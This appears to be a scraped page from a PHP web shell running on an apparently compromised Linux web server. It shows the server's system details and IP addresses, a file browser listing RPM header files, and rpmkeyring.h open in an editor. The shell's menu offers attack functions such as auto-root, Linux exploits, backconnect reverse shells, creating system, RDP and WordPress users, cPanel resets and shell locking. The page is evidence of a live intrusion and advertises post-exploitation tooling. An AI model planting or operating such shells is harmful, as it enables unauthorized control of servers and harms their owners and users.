Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
argv.h
4.11
KB
-rw-r--r--
header.h
13.37
KB
-rw-r--r--
rpmbase64.h
1023
B
-rw-r--r--
rpmbuild.h
3.28
KB
-rw-r--r--
rpmcallback.h
1.38
KB
-rw-r--r--
rpmcli.h
12.45
KB
-rw-r--r--
rpmdb.h
6.15
KB
-rw-r--r--
rpmds.h
11.61
KB
-rw-r--r--
rpmfc.h
2.44
KB
-rw-r--r--
rpmfi.h
13.02
KB
-rw-r--r--
rpmfileutil.h
5.04
KB
-rw-r--r--
rpmio.h
2.21
KB
-rw-r--r--
rpmkeyring.h
2.59
KB
-rw-r--r--
rpmlegacy.h
7.5
KB
-rw-r--r--
rpmlib.h
5.34
KB
-rw-r--r--
rpmlog.h
8.48
KB
-rw-r--r--
rpmmacro.h
4.21
KB
-rw-r--r--
rpmpgp.h
46.34
KB
-rw-r--r--
rpmpol.h
388
B
-rw-r--r--
rpmprob.h
4.67
KB
-rw-r--r--
rpmps.h
2.29
KB
-rw-r--r--
rpmsign.h
740
B
-rw-r--r--
rpmspec.h
2.21
KB
-rw-r--r--
rpmsq.h
1.34
KB
-rw-r--r--
rpmstring.h
4.08
KB
-rw-r--r--
rpmstrpool.h
3.83
KB
-rw-r--r--
rpmsw.h
2.09
KB
-rw-r--r--
rpmtag.h
20.22
KB
-rw-r--r--
rpmtd.h
12.21
KB
-rw-r--r--
rpmte.h
6.45
KB
-rw-r--r--
rpmts.h
16.8
KB
-rw-r--r--
rpmtypes.h
2.49
KB
-rw-r--r--
rpmurl.h
1.11
KB
-rw-r--r--
rpmutil.h
4.68
KB
-rw-r--r--
rpmvf.h
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpmkeyring.h
#ifndef _RPMKEYRING_H #define _RPMKEYRING_H /** \ingroup rpmkeyring * \file rpmio/rpmkeyring.h */ #include <rpm/rpmtypes.h> #include <rpm/rpmpgp.h> #ifdef __cplusplus extern "C" { #endif /** \ingroup rpmkeyring * Create a new, empty keyring * @return new keyring handle */ rpmKeyring rpmKeyringNew(void); /** \ingroup rpmkeyring * Free keyring and the keys within it * @return NULL always */ rpmKeyring rpmKeyringFree(rpmKeyring keyring); /** \ingroup rpmkeyring * Add a public key to keyring. * @param keyring keyring handle * @param key pubkey handle * @return 0 on success, -1 on error, 1 if key already present */ int rpmKeyringAddKey(rpmKeyring keyring, rpmPubkey key); /** \ingroup rpmkeyring * Perform keyring lookup for a key matching a signature * @param keyring keyring handle * @param sig OpenPGP packet container of signature * @return RPMRC_OK if found, RPMRC_NOKEY otherwise */ rpmRC rpmKeyringLookup(rpmKeyring keyring, pgpDig sig); /** \ingroup rpmkeyring * Perform combined keyring lookup and signature verification * @param keyring keyring handle * @param sig OpenPGP signature parameters * @param ctx signature hash context * @return RPMRC_OK / RPMRC_FAIL / RPMRC_NOKEY */ rpmRC rpmKeyringVerifySig(rpmKeyring keyring, pgpDigParams sig, DIGEST_CTX ctx); /** \ingroup rpmkeyring * Reference a keyring. * @param keyring keyring handle * @return new keyring reference */ rpmKeyring rpmKeyringLink(rpmKeyring keyring); /** \ingroup rpmkeyring * Create a new rpmPubkey from OpenPGP packet * @param pkt OpenPGP packet data * @param pktlen Data length * @return new pubkey handle */ rpmPubkey rpmPubkeyNew(const uint8_t *pkt, size_t pktlen); /** \ingroup rpmkeyring * Create a new rpmPubkey from ASCII-armored pubkey file * @param filename Path to pubkey file * @return new pubkey handle */ rpmPubkey rpmPubkeyRead(const char *filename); /** \ingroup rpmkeyring * Free a pubkey. * @param key Pubkey to free * @return NULL always */ rpmPubkey rpmPubkeyFree(rpmPubkey key); /** \ingroup rpmkeyring * Reference a pubkey. * @param key Pubkey * @return new pubkey reference */ rpmPubkey rpmPubkeyLink(rpmPubkey key); /** \ingroup rpmkeyring * Parse OpenPGP pubkey parameters. * @param key Pubkey * @return parsed output of pubkey packet parameters */ pgpDig rpmPubkeyDig(rpmPubkey key); /** \ingroup rpmkeyring * Return base64 encoding of pubkey * @param key Pubkey * @return base64 encoded pubkey (malloced), NULL on error */ char * rpmPubkeyBase64(rpmPubkey key); #ifdef __cplusplus } #endif #endif /* _RPMKEYDB_H */
Close